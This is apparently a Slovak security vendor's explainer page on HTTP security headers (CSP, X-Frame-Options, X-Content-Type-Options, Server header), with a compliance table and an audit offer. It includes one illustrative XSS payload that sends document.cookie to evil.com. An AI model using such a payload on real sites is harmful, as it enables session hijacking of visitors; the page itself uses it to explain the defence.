Bezpečnostné HTTP hlavičky sú neviditeľná obrana vašej webovej aplikácie. Bez nich je každý návštevník vystavený riziku.
XSS je útok, kde útočník vloží škodlivý JavaScript kód do vašej webovej stránky. Keď váš zákazník stránku otvorí, kód sa spustí v jeho prehliadači s jeho oprávneniami — môže ukradnúť prihlasovací cookie, presmerovať na phishingovú stránku alebo zmeniť obsah stránky.
XSS je trvalo v top 3 webových zraniteľností podľa OWASP. V roku 2024 tvoril 23 % všetkých webových zraniteľností (HackerOne Bug Bounty Report).
<script>document.location='https://evil.com/steal?c='+document.cookie</script>
CSP je HTTP hlavička, ktorá presne definuje, odkiaľ môže prehliadač načítať JavaScript, CSS, obrázky a iné zdroje. Ak útočník vloží škodlivý script, prehliadač ho odmietne spustit, pretoze nepochadza z povolenho zdroja.
Tieto direktívy povoľujú všetky inline skripty a eval() — čím efektívne vypnete ochranu CSP proti XSS. Ak ich používate, útočník môže vložiť škodlivý kód priamo do HTML. Používajte namiesto toho nonce alebo hash pre každý legitímny inline skript.
Clickjacking je útok, kde útočník vloží vašu stránku do neviditeľného iframe na svojej stránke. Používateľ si myslí, že kliká na obsah útočníkovej stránky, ale v skutočnosti kliká na tlačidlá na vašej stránke — napríklad „Potvrdiť platbu“ alebo „Zmeniť heslo“.
X-Frame-Options: DENY — zabráni vloženiu vašej stránky do akéhokoľvek iframe.
Modernejšie: Content-Security-Policy: frame-ancestors 'none' — rovnaká funkcia, ale s väčšou flexibilitou.
Prehliadače niekedy „hľadajú“ (MIME sniffing) čo je obsah súboru a ignorujú deklarovaný Content-Type. Útočník môže nahrať súbor s príponou .jpg, ktorý v skutočnosti obsahuje JavaScript. Bez tejto hlavičky ho prehliadač spustí ako script.
Táto jediná hlavička zabráni celej triede útokov. Napriek tomu ju nemá 37 % webov (HTTP Archive, 2024).
Veľa webserverov odosiela hlavičku Server: Apache/2.4.51 alebo Server: nginx/1.22.1 s presnou verziou softvéru. Toto je information disclosure — útočník presne vie, aký softvér používate, a môže vyhľadať známe zraniteľnosti pre túto verziu.
Server: Apache/2.4.49 — táto konkrétna verzia ma CVE-2021-41773 (path traversal), ktorá umožňuje čítanie ľubovoľných súborov na serveri. Útočník vidí hlavičku, vyhľadá CVE, spustí exploit — celý proces trvá menej ako 5 minut. Odstránenie hlavičky tomuto zabráni.
Bezpečnostné hlavičky sú „bezplatné zámky“ — ich pridanie trvá minúty, ale bez nich je vaša aplikácia otvorená triede útokov, ktoré sú automatizované a masovo využívané. Automatické skenery (Shodan, Censys) neustále prehľadávajú internet a indexujú servery podľa verzie a zraniteľností.
Každý XSS útok uspeje. Útočník môže spustiť ľubovoľný JavaScript v prehliadači vášho zákazníka — ukradnúť session, presmerovať na phishing, zmeniť obsah stránky. CSP je jediná spoľahlivá obrana na úrovni prehliadača.
Vaša stránka môže byť vložená do iframe na ľubovoľnej stránke. Clickjacking útoky môžu spôsobiť neoprávnené transakcie, zmeny nastavení alebo zdieľanie osobných údajov.
Automatické skenery denne indexuju miliony serverov podľa verzie softveru. Keď sa objaví nový CVE, útočníci majú hotový zoznam cieľov — a váš server môže byť na ňom.
| Framework | Článok / Kontrola | Poziadavok |
|---|---|---|
| NIS2 | Článok 21 ods. 2 písm. d) | Bezpečnosť IT systémov vrátane ochrany webových aplikácií |
| SOC 2 | CC6.1 | Logický prístup a ochrana pred neoprávneným prístupom k dátam |
| OWASP Top 10 | A03:2021 | Injection (vrátane XSS) — bezpečnostné hlavičky ako ochrana |
| PCI DSS 4.0 | Poziadavok 6.4.1 | Ochrana webových aplikácií pred známymi útokmi |
| ISO 27001 | A.14.1.2 | Bezpečnosť aplikačných služieb na verejných sieťach |
Náš audit overí CSP, X-Frame-Options, X-Content-Type-Options a Server header za 30 sekúnd.
Spustiť audit